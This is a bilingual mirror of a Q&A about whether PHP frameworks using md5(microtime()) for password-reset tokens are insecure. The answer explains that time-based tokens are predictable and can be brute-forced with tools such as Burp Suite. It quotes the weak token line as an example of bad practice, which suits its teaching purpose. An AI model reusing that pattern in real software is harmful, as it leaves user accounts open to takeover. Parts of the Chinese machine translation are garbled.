使用microtime()生成密码重置令牌的不良做法 [英] Is using microtime() to generate password-reset tokens bad practice

问题描述

在PHP中，我注意到某些框架利用microtime()函数生成密码重置令牌，如下所示:

In PHP I've noticed some frameworks make use of the microtime() function to generate password reset tokens as in:

  $token = md5(microtime());

这是一个安全问题吗?如果攻击者能够将时钟与服务器同步到一定程度的准确性，则他们可能会强行使用令牌. 1秒的同步只需要进行1百万次尝试，这并不是一个问题的疯狂.

Is this a security issue? If the attacker is able to synchronize the clocks with the server to a degree of accuracy they could brute force the token. 1sec synchronization will only require 1,000,000 tries and this is not too crazy of an issue.

此攻击成功的可能性有多大?应该使用/dev/urandom或openssl_pseudo_bytes()来生成令牌吗? microtime()是不好的做法吗?

How likely is this attack to succeed? Should one be generating tokens with /dev/urandom or openssl_pseudo_bytes() instead? Is microtime() bad practice?

推荐答案

是的，这是一个安全问题！随着时间的流逝生成令牌是非常糟糕的做法. Burp Suite 使攻击者轻而易举地使用可预测的令牌，并且基于时间的令牌非常有用.可预见.打p使某人可以轻松收集令牌并对其进行统计分析以确定熵.使用此信息，您可以轻松预测未来的令牌.

Yes it is a security issue! Generating tokens with time is a very bad practice. Burp Suite makes it trivial for an attacker to brute force tokens that are predictable, and tokens based on time are very predictable. Burp allows someone to easily gather tokens and perform statistical analysis on them to determine entropy. Using this info you can easily predict future tokens.

请记住，攻击者只需纠正一次即可.数百万次出错都没有任何区别.

Remember, the attacker only needs to get it right once. Getting it wrong millions of times makes no difference.

这是关于令牌生成的有用(最近)的StackOverflow帖子，可能对您有所帮助:

Here is a useful (and recent) StackOverflow post about token generation that may be helpful to you: REST Web Service authentication token implementation

这篇关于使用microtime()生成密码重置令牌的不良做法的文章就介绍到这了，希望我们推荐的答案对大家有所帮助，也希望大家多多支持IT屋！